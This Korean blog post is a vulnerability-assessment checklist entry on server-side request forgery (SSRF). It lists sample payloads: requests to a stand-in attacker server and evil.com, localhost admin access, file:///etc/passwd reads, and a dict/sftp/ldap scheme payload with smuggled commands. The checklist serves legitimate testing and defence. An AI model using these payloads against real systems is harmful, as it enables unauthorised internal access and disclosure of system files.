티스토리 뷰

※ 일반적인 점검 방법이며, 양호/취약 여부는 사이트에 따라 다르게 적용,논의될 수 있습니다.

항목 서버 사이드 요청 위조 (SSRF)
대상 모든 대상
항목 설명 사용자의 입력 값을 이용하여 서버가 요청을 보내거나 외부의 리소스를 이용할 때 발생하며 사용자가 접근 할 수 없는 영역에 무단 접근이나 데이터 엑세스가 발생 할 수 있습니다.
점검 기준 o 외부에서 접근 가능한 서버에서 전송하는 요청 메시지 파라미터(IP,URL )값을 변조하여, 공격자가 직접 접근할 수 없는 네트워크 대역(내부망 등)에 위치한 서버에서 변조된 요청 메시지에 대해 응답값이 반환되는지 여부를 점검
점검 방법 1. SSRF 파라미터 위변조
1) WEB서버가 DB 등 타 서버로 요청하는데 이용되는 파라미터 확인
2) 파라미터에 공격구문 삽입
  A) http://[공격서버]/GetCredentials - Web 서버 권한으로 공격서버 기밀정보 접근
  B) http://localhost:8080/admin - Web서버 권한으로 관리자페이지 접근
3) 인가된 Web 서버의 권한으로 접근 및 기능이 동작하는지 확인
2. URI Scheme을 이용한 내부 시스템 접근
1) WEB서버가 DB 등 타 서버로 요청하는데 이용되는 파라미터 확인
2) URI Scheme을 이용하여 내부 시스템이 요청에 대해 응답하는지 확인
  • file:// 프로토콜file:///etc/passwd
  • (Java Application)일 경우 : url:file:///etc/passwd
  • dict:// 프로토콜 : dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
                                ssrf.php?url=dict://attacker:11111/
  • sftp:// 프로토콜 : ssrf.php?url=sftp://evil.com:11111/
  • ldap:// 프로토콜 : ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

'정보보안 > 모의해킹&취약점점검' 카테고리의 다른 글

소프트웨어 및 데이터 무결성 오류  (0) 2024.06.04
식별 및 인증 실패  (0) 2024.06.03
보안 설정 오류  (4) 2024.06.02
인젝션  (0) 2024.06.01
암호화 실패  (0) 2024.05.31